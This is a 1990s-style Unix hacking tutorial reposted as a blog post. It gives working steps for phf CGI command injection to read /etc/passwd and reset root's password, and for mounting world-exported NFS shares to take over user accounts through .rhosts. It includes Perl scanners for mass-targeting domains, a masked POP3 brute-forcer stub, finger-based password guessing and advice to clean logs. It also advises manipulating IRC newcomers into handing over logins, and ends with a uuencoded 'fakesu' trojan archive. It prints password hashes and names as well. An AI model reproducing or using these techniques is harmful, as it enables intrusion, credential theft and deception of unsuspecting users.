You can get rest of the post of this series from here: http://blogs.ibibo.com/hacking
I was just trying this new blogging service. And I'm too lazy to copy all the stuff from there to here. So, refer to the link given for missing posts.
I'll continue writing here now.
There is a program in the WWW cgi-bin directory called phf, if the file
is there, and has permission x, you can access it by using the www, or
a text version browser in linux called lynx. Now you can read files on the
system (yup .. /etc/passwd) and save them to files local in your computer.
There are many things we can get done here. If the server is running their
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.
I will include a perl script here that will auto check all of the systems out
there by using the getdomain.pl script above and check what the server is
running under. If it is running under root, it will just log the id, if the
server is not running under root, it will auto get the passwd file from the
/etc directory and name it domainname.???.passwd.
I will also attach a script that will allow you to use a simple command from
a shell and if phf is on the system allow you to pipe commands from the shell
to the remote system with one command line.
Ok now that you know what is coming, lets teach you how to use phf.
Use your favorite web browser, or the text version in unix called most of
the time lynx, on some systems www.
After the screen comes up type the letter g, now a line appears like below:
URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
You type:
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
It returns:
QUERY RESULTS
/usr/local/bin/ph -m alias=x id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
So here we see it is running under a user (nobody), so we can be a user named
nobody on this system. We are not root, but this will have to do ;)
Notice the command line:
http://afp.org/cgi-bin/phf/?Qalias=x%0aid
The id was the command to the server to give us the id of the user. Some times
you will have to give the full path to the file you want to run, in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id
Notice that after the %0a you start your command line. If you need to enter
a space you would put a %20 instead of the space. Here would be some sample
command lines. I will start them with %0a
Cat the passwd file
%0a/bin/cat%20/etc/passwd
Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*
backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my
Change the root passwd (if the server will let you (most times it works)
%0apasswd%20root
(the above should let you login without a password, make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)
If you know how to type commands in unix and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!
Ok lets cat the passwd file on this box ;)
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd
We get:
QUERY RESULTS
/usr/local/bin/ph -m alias=x cat /etc/passwd
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
A small passwd file
If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.
Lets learn something here:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7
1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell
Ok, lets say you do not want to keep using the WWW browser, here is a script
you can compile to just type regular commands from your shell. (in next post)
Next are some ways to get password files from unix systems. Most of them
you will need an account, but there is still a way to access to the system
without having an account. Here you will learn the difference between a
regular passwd file and a shadowed passwd file. You will also learn a way
to read the shadowed password file.
Ok, now on to mounting the drives ....
lets say we did a showmount -e domain.com and got back:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
We would want to mount / .. yup .... this guy has his entire system mountable!
$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount
Make sure you make the mount directory first, you can make this anywhere on the
system that you want. If the systems /mnt directory is empty you can use it
also.
Ok this is for real:
bash# ls -al /mnt ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; lets make one for them
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost+found radius-961029.ps
bash# ; there is is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> ; yup we are in!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .proofile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhoosts
>
So now we have access, so lets just hack this system ... oops, that is another
lesson! Have pun!
To use this script simply use the domain ripper in the PHF section and download
the needed files from rs.internic.net rip some domains and name the file
'domains' and startup the script. To make it run in the background put a
& after the command. like this: cmount.pl&
How it works:
When you run the file it will go to the domains list and run showmount -e
on each domain, if it finds that there is a return on mountable drives
it will save the info in the current directory in files named:
domain.XXX.export. All you have to do is view the files and mount the drives!
--------------- start of cmount.pl
#!/usr/bin/perl -w
#
# Check NFS exports of hosts listed in file.
# (Hosts are listed, once per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net - 2/27/97.
# Assign null list to @URLs which will be added to later.
my(@result) = ();
my(@domains) = ();
my($program) = "showmount -e ";
# Pull off filename from commandline. If it isn't defined, then assign default.
my($DomainFilename) = shift;
$DomainFilename = "domains" if !defined($DomainFilename);
# Do checking on input.
die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename);
# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename) or
die("mountDomains: Cannot open $DomainFilename for input.\n");
while (
chomp($_);
print "Now checking: $_";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program $_ |");
@execResult =
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">$_.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
This is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines drives
you yours. This is done so you can do installs from other machines, or just
share drives or directories across the network. The problem is that many
admins are good with unix commands or setup. Or maybe they are just plain
lazy and mount the drives with world access not understanding that the world
can mount the drive and gain write access to their users directories.
What you will need to get started here is a hacked root account. To be able to
mount the remote drive and gain access you will need to modify the system's
password file and use the su command.
Ok let's say we have root access. let's get started!
You can see if another system has mountable drives by using the showmount
command.
From root account:
$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
Ok, no problem, this domain will not work, go on to the next one...
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
Notice the (everyone), this would be good if we wanted to install linux
from this guy's box, but we want open directories to users.... so go on to
the next one...
$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)
Now this guy mounted his home directory, the user accounts are off of the home
directory ;) and look above ... (everyone) can access it!
Ok, this section was to show you how to see if they are mountable, in the next
section i will show you how to mount and hack it. But for now, here is a
script that will scan for EVERY DOMAIN on the internet that is mountable and
log them for you. (Next post)
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
You could also write a small perl script that will finger @ from a domain
list and cat the response to a file, then when done it will go back and try
to login using pop3d username-username (or other info) and putting the
response into another file for you.
You can ftp to rs.internic.net:
in the domain directory you will find:
com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
download these files and run getdomain.pl (In next post) on the domains you
want to target first, in this manor:
"perl getdomain.pl com.zone com >com.all"
What this will do is rip all of the .COM domains and put them into a file
called comm.all.
If you wanted to do all of the .EDU addresses you would type:
perl getdomain.pl edu.zone edu >edu.all
Now you will have a list to use with your probe called edu.all
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
my(@lines) =
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash{$key}++;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "$_\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
To use the script above all you need to do is copy between the lines above
and name it getdomain.pl, now copy it into the unix os and type
chmod +x getdomain.pl
Now it is ready to run with the command lines above.
There is another way you can do this. Be sure that on most big systems
that users do not use secure passwords. from a shell do this:
finger @domainname.com Watch I will do a real domain:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
Now we might want to try logging in later, log this information:
Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...
This one looks good, wendt:Catherine:catherine
Here is another command:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
You get more info to play with ;)
I know this can make you tired ....
Remember this stuff will log your tries, so if you get on and get root, clean
the logs ;)
In next post, you will get a small .c file you can use if you get on.
There are other ways to get an account without doing much work. Park yourself
on an irc channel that you made with a title about hacking. Also try joining
other channels already on the irc. Channels would include:
#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout or any others you can find.
Now what you are looking for are newbe's looking to learn or exploit their shell
they are on already. There is always someone out there that does not know as
much as you. Watch for someone out there that asks a newbe question and gets
no answer or even kicked off the channel. Here is your mark ;)
/msg him so that others can't see that you are talking to him, and begin to ask
him questions, try to help him, but not too much ;) Finally tell him that you
can login for him and do it. This could be to snatch the passwd file or god
knows what. Promise him the world and get that login password. Now you have
a start and can start your on-hands learning process. If you get root on the
system you might not want to expose that to him, but you can feed him other
goodies that will keep him busy while you sniff some other passwords on the
system.
So now if there are some out there that remember i-e when you gave him your
login and password, you can be sure that the above never happened
I tend to like to help people learn so I am telling the truth when i say I
have dealt honestly with most everyone I have come across.
begin 644 fakesu.zip
M4$L#!!0````(`"\B1")UVD\.'0P``#DP```(`!``8V]N9FEG+FA56`P`DZ/X
M,KH,]S+\`0``M9I;\$8
M6E*O$4WHQAK-K]]S&B0+A&@EFZV:&NL"7Y]S^EP;7?Q($IXOV/+SZC,A$YK3
M,I8T)7$E^3J6+(FS;$M>MLU554GALA\OOKLXN(_E`[F"Y93PA:$Y\2P'\A/G[\CA`1;(>F:U%<+(OB:2K:F@J3U]7+%A+KP MGI+_5$*239Q+(CF)WS@#84A)U95,,N#2LN0E@=M%O&PT^9XM<$M.5)_#G9VZ<(D"N M*'FEVPTO4Y)RT"WGH``3B\(>#K$LJ7W[YYT<)K_%N_)PM0 MV2SC[:=_D#A/ZY>/,X\(9=K:>B&8D2RJ/%%F@MT57:-QZC(#3,+X$UB2QGW!$:H>/)_(%LF%R1*Z!)H.+DME/8THVN:2T%8KCZ/2]"3""K1X9[!%,N25X48*77GHE+>
MB=Z#VE(0@Y;DF>5R1$"VYR5+(SEJ/*1Q-3#KQ'?G7A"%1'W?\0-<%1?*>)S&
M;\O1NSUS2E.!`K]04E8Y2E6!<\)"\`I076UAI:EKC(V[2>3Y]IT]M296UX1`
MJ\6%E94!T1`"3*=<*!_))D*Z;"7Y<=!M>456\1MM]OHCB04$SUX#C)HX*7G;
M(K?&G;5S[\M3P*O&>T`R=#\FB5CQ*DO1&)4`#_L!W1W6F&>R9%__=G*)Z+9W
MD92CLFJIMZ($DRS(2P7:\_JS*.5%F<&R#@(>!6?)/W
M[VXO^7T'ATRM@AR3Q_-Z'1>CW9*8.7NL,)L9WFDSH_<)62XP.P[+%H3^36C/ MK%-ZR[)*((76JLMU](T?>Y$"A;/HR77Z.8?;TC!:VX+BTJ^2EGF<2f_>/CD&2#RH_6[WV\JW,'<03dyxt^:`ea'dg6p?qk$<";*!/pik0mi= _="] 420=" m9vh="" 8836b="">:.[3H#_G:EF/OLNK-,30"OF)MAVS*88S*>+_]PDN&+15^243Y:
M^_B^SA4E?V,I)9X;@*$NR8+&$CH%R,E?$UI(]`I5)%2JKE<[RI>1NCFZ/*C4
MQR;`)(P:,[RT''Y)5`^=N`
M&5'I@_3VKUKQ#8-:#IEYP[(,\C(BVFU<2m,jp>9.8@'[A$D&"JFJ\-'8]BTS
M1-?[C?R=_/J;6@J-N(FAH5FQ)5HV3E/85$'%\5U7/7=E?#-\TZ_U32U%&Q6K
M'$V1?]>V<1?0zys/060'/x[j6j=:";6-z"7u+ny;,_3;@i;9mkn7l$x8s0s3 m="X/HVG">_6$,1B6L:3F##-M<=+EE`HA'M^`S"L1G=6L;8\H-V?(+:37]\1WQH M@&+8Q9^/!+KS?^X7(8',(N(%A?UE>9)5$(4O?->/J2UN:O95\Z8M%]:0Z-X.
M;Z/@$7HBNS\_EVU<2i,lqo#>EYFNO%!5;.<=^==T/55/UX.A8.4)+RF9SXRC M)(V?#=\!MOY)E0N5IJ]8_GN$GE*)BZ2H\!4*AK'$H&V'[44?54(??-VWZL_1 M3R=J`SA=`@&A$A='*^+,('8)DI(UAYJ!28@M('!SE3U?MA(D9R5\\T/&7BF9 M<;B79[':VL`S?/,CQ(SZRLXES=3G=\;#W[JRW;O^&)S:GD!#;QL]?EVGK?<-[3S&/.R+NC6X++)HWZ8C[?W-;F]5X)604(XJ\/NU@\U<+8<`UW7-R;WM M!$\8X[@E,(JI$;C=AZM+=N[HA8]_ELYX(C,='^X*I\?^?HG+.--@-Y516"MM MV]5RC.NI%>%%7:M>MO)-$DNPE%`[7#=HNW$9.G$R<>9H2`E]66^_9QHA[%\P
M:(114Z39+BD_[P*=EFO&Q:AN:9IF!OT3.[Z4)%&V#]M6RV9&4]NQ-'HU4O])
MO4"IT'HX-0=@KR=2,9E80&!,KZ)'ZX-O^I'@P76#@7F!D
M7U2%ZMY%01,&;3$NV,/V?->,YM[IA'O`AO)P!_-6G$)O4,1"U/D"S:1Z,?4%
MJ'9X&--:*[@UQNY]=_+:>65G^"B28CO4?0>A9WJ/FA%F*S*^'*0\!E-W,J3Y
M:%]=*KDN6@[7>%LEHQ6DRA[Z/(QNW2`<%O(*N5^QZAQ4[5[7FHWA<%<"@HG MH'W3V92TR.)$]9'O4WU[$.\JT`".$I*"ORK9_P=X#1C,I\!\K<,#HA>&.UXR
MN57.*P[>'PS-XJ,J>%5=D)]SEM#1KO@>S4VVB:%DN[Y]E->;HR7T%4QA^#J%
MR:ED@#YR2@_Z2HAS\D&L/L'7F?B@4.%*)0O(N#3?=^[-D*Z&C`^8ECY\5/HT
MC,YYDS./]G"\N+U`)Q95&[DW/J03R55O!,,U[D#\TLTED$9"-WSTNAD*@,N\
MBO9G"7]TCW?\/>"0=FHNBQY>*$UTXP14127RV]1PJN##>I)
M<%%D^).GR'3GCB;+-<0<"^o@@5*#=$[5t"-d'0)l,5@m&fh0^k8sl6\t=>,%
M9A\5KP/$:R.P],=(+PD?+F/7IJNK8LFJY'QP&\Q;WW4U&Y"4VV(8XC]Z&D::
M['JCP2TO)2TR#@/1`.9FZKJ^
MAM%S;-IFG&JWWAE@Z&23#D'`QN;]6$M):<;6&L[8FMHS+:F9B891]4,-+0L; MII-@_73\:X['&YGNF+F[W3'WP-LPSB6?QFEGV+SCOWW4R\9)B^M<( MZ.'P`/E?*R"Z+E^D\6#2PO`&#W9OQH8F=P$1ZFDI5A0*[#!Q'D`%O+6FTV$B M?":C7/)X"`=#7A@YH3OP)*EFL3.\VG;LL]R:B5@DC`VB`B,P;7N8@ZWR<-&8 M63/M[`,4?%XY3`DL33I<\W3P&,3=BHK!-';R"SOQM2$MO'EK.W;"6^,AIB('/FS03
M+]7)`5NNE4.0E>A`WV%_HN.
M*&290+>)L_$@R3>AWS1G^F>VT"WJ2+>:6HH44>0Z3.`Y6D[]&YEAD.7[NHX*
M2&\4
M^4U3=<(G;=&I=(EGKD\Y5S@;]AZJM7\,@E-A_T]!#E%%?(%]QSD\SZB[#QUT MD>1XBJ\#WIA..-7#H*\\0SJ870R]9#`O,/4X24.#F<$.`SVN.?+6XE3RU^+6 M<;*ZP/_..3&=&>9M_5_/J6F7BP_"]6+.U.^'M&*"MZ0O>AIXROCZ'!BZ'_C@
M643E?[:CQV;1_HFG!CJ-U.&>%EG$$NEQ>-86E_'Z#"(^\#-\8W865/#D]9Q<@]3`-;^T##/<`)5Y<@9?J<7/' 9=";\L.G3'UP]">;7]0'@\#ZGR^00
M"&]/XL83W=#$#E'L),C68%[5[ZX.4.J#D[@O.-EID%P<\K@X"7/['V`?CCXM M@\';DRSH[W6P^MGK(4]]TOYN^Z.!```M`D```<`$`!EUX>4@S82!!0[JGAR
M%WM,5G+6T>XFE%-__'VS&P@Y]7I]Z$MB[\[.?//-MS/>VR&VMK/]*>WN4LU5
MJZSRNC/4=#9N[5J>=]9KTX5E
MIKQK_(.R3!?=PM3!8T9#4_5[@^H9EVMFT?Q@S5X9TM^RN39SAQU37CY-)K0)S9L54LWB[M6
M5W2I*S:.22&TK+@IUW07_,B)_X)]2JRQ;VG)U@DQ!QD!1**\X+34S<4j%3?* d="*#;ENZ8UHX;A9M)BY@3%^&Q">?K24&#
MT2U]&8S" q="">PIC/^VPRTN.KO1LWFIX1AI6&?\(1L3#U?GX[#..##X.+X?%
MK:1P,2Q&YWE.%]=C&M#-8%P,SR:7@S'=3,8WU_EYGRAG@<7bx">,-J$H8*UF
MKW3K8MJWJ*(#MK:FJ5HRJEFQ7@*9H@K:^?]*!4K;#KJ3)&&\IO&4=$.F\QD]
M6`UQ^.ZG-0PKTMW4!O#9V/Q]?C\G/9VT+.C3:\7L'2RJ@LE5\5NBQ[
M>SM1"`TKOP`Z/*HEV%)WP`(9W%?5DVP<'?2/1.U133'V%DG.90F^SLJ2_J0# M^OZ=DN>%#Q^P\N;-D\75<`0\8G>4BF%9YL5X>%:4@U$^+`4X/4'?P)GD5PAAIOQV@/YU;K7Q#5Z>G+M0
M4*2NJHKG/MR^?Z=]W']'"3<-G$,K[2.63M+?1L5)NIEWQ(NM^+"Y&?%C,SZL M:=A:_8=*K^QK"9\7?R%\&D/'EYZ0=B,.(/L9.Z?N.
M#8J,^OU^NGT:^EM0VFAR)6HQG?F;;9#(I)ON%#FJ4VRH?K_=R<(C#^!M=)/)1NKY3/WW#$T++3-:VB2%+. M0\TN(WG&LEG,,MQNXSQ54V5I)Q(;<=9[]>H5HB^,T_<&OTZTQX-U%:A*$2-?"R&!(\(`_]$FTPU%B1FZ-MH2C7,I0>M..-
M&)7"CW1*.?XTKI^'Q!S#?<9@tr%_yug5l;ho&4yv(lQ*=I!_
MB^;\4@E8_E%UL/Q+GF'W?*>>VF3H*Z$U"M;*\HR-M`Q6%4:!GC%T*MZVQ4"R
MYLU<-@H=XZZN7UEA+OA8IKP#'7#FZ`'7$GU,)DF85AC%,TP#U(976<,K0V<:WB(5")&X$YH#H1( M(\:1Y_$B)_\!4$L#!!0````(`+I,12+5AMY/@@(``,X$```*`!``9F%K97-U M+F1O8U58#`!/J?@R3ZGX,OP!9`!M4TUOTT`0O>^O&$JE@I0X`BXHJ(>J"K2'
M%M0D((00VMAC>XF]:^VLF_K2W\[,KI.T0`Z1]GGFO?EX\U%O$99KV`QP6QK[
M'J9@IJC4]=WE'&8M5>FYT#2`)G@S>3MY!UF6*759:ULAA!JATZ$&8\%9!%=&
MJ"?TH//<]380(SK`X'JH]3T*C,2@B[@2G!#!$&<96tdyi7-2%O)G/>*@-
M!><'*$V#-)'LV@302;PTGH)Z+M,U.L<20`al,tc)a4x*v!?`[qg'3c4q@y_p62bz.0468.xx)?n#!9qm-]:_.nua!>YL$X2\J4\`.F)3S.8J+/
MX><'";<*QE]V_';`2B/,:UDV=9B;TN2`]MYX9UNT(6I0T#[T'7`IE=+V<98m;c]>IY>>Y'UW&S.#\Y40H?.N<#[#'@!96MC.'I)5X9=_SOW65^L9=IAT-/)6B92?[WIX1G"W79\#K
MCRMC*`8MU]-QDR8!D585QF,^&E0*D,X]QIH/'N@T$>^U`+'3T+$Y=WQ3.QY6
M-8E[7B5BMNLX++9!WQ2CGWNQ>VV*`@\^CK2ST';P1-_Y>%-1EGT3M+&4O.5< M.!;QRATN-('%ZU05G\9U&?O6I+B,B"```3A8```P`$`!L:6)G971T97AT+FA56`P`NZ/X,AG\^#+\`0``
MK5AK<]I(%OUL_8H;IVH&7!C;R<;89@NP"_!F7;-;VD9J4-=*:DIJ MF6$S^>]S;DL"\7"<[(XK`=1]^S[.?;;.3BA4T[DT1OYFF@&=GM)`IJF82_*$ M$:&>IS33":G8R"061NE8A.J_]D?3(:*.7JP2-0\,U3IUNOCPX8<&?_Y(-XF4 M--8SLQ2)I!N=Q;X]U:!>[#4=9Q*HE!:)GB<,7U:T+=HI3-H$%,B?96: M1$TS(TD9$K%_!GTB[:O9RL$"^,J$3"`)&D8IZ9E]N!T^TJV,92)">LBFH?*H
MKSP9IY($Y/)*&DB?IBN'R5_2MD5283^A9YFD>*9W#8+XFC"L84)ZP51U1\0K
M"H79$!ZP<&.(#SRMEH%>0.\`W&#)4H4A325EJ9QE8<,!)7WL3>[N'R?4'C[1
MQ_9HU!Y.GEJ@-('&KGR6.1\5+4(%MM`^$;%9`05GT!UU[D#?ONKU>Y,G5ONF
M-QEVQV.ZN1]1FQ[:HTFO\]AOC^CA=TI#D(MGEO#0+G!K45J1K$V#5HF"A%@
M-.VYR]D-K@;]\($F$IA(>@B%)^F4QAD??__^O$%7.C5,.FC3^;N+BXO3B_?G
M/S7H<=R&_2=GCG-V0E?2$_`#P>.ICA"8J]1(1%=--N=-2`Y%HM(Z+:7=-BJ2
M:6XY%%2Q%V:^Y.Q@79N5_8Q8%
M-P;$2(^-)#'5SQ*Z7B$$JA("*3@7(IN."YD$8I&2"%/-?'PY4[$DM]^[Z@TG
M??>.4XF/)W+&(DOY,*`097G;8\J*9=("H;?PRIN<\Z_?[[SL9M=S+I M_F."O9=/.6_WU3NZ<-[*&%GNO*WLK;EAF_WT498G42N$[ZN\0@&2:*I#-B95 M<8yd;&sx<)r6m=`:na;m/hz[+lzxa0)tp2`4kodk''!f>]@WIHTU)X()=,5UEEZB($,;Q%F*?]WH`#*
M+1UWCNG3FA#F_O(+X8'5A(]0G'FA\$?,/)#2[<&8Y3&_\>2ZX[IX*C'*MVLB
MF2-V^1-[,D3VO4!28\\43BB4*"4-'_O]7,[:HQ4#.`PVR\!M6P\^3+7:LU8^
MG=3IO+ZO1TYR?E`!>I/#VW$'J&;MV^Z8L;'E]EF$F2U,Z`5@DUI?3R4B6]ER
MG=>APL>UNLT!?_W($3'+8IME17Y5LI]\#88H1D6BL+S"2!!?YWHK8_->H_)A
M3V2AR74JXJDTKZ([U4XOZIMH@"77TD-]L1&9=]]"P=,L5?'\%(T9"VG>DV<#?2A#/GM1NG<1>P[GW#$@S!#7B`2
M.N&-EL.UIR"*LV@JDY;SN>54XKO3GB`="O`E)]92P]I$B6D(I$0BUT%0]#N1
M&1W!,.1`N$+OI84^-?@W#9NI]%GQN6T/W")M5?PWC#U5OJ7POL^U+Y(C5WC'
ME/P'J'_]5ZLD5)5E-Y3QW`2M+;QO`'%%,\*Y1'AE08CR>2BM5/I8H\.)T'H:
M_38-\^J!>(BE]&TX]*`GPV[`:&1RG#&5+R8R!3!L5UF"C^[L=:+VM@D
MR$#^M$KVM?X/90L:C&][UR6>7I8D;'49:M'V[&:#IT+'"E[5G0#EF,-AZ+U;8?8V"EL*`H)LGPKL-@/RJ_76P ZK
MQUZ$XOI^T.X-A^U!]W]&8=<4_q5;?$2,bf,1r09]c97^jv96.#i'^'n)[9^`>&XV4(O/\/@]P,FX$N%)%SG:SV[U!8E0@Y03/PK#,D$,\#Y\Z/N8S*:NAJ9)(7%^.RP)S?`!_1B6W_75D
M]G#='/X:8,NX&B^DA[M5/C&]$E/EE<46cgq:i>O>R-*BB@?V9B;B,CJ+/II'
M&V%D%S05Z:&X0[ORO\7VPU'AJ^0@,-O<% M>M=\CZ$AK0X?ZT&#^)ZWR3-01RKE1F]#::QY:M61,OG`P1?.J+B`VY2NB."1
M9?*Q45GZ"[-@P6O^Y1RRGJ**)D[??4>U?*4<<3'#v>?K3K&"1K09T,JA:6!K
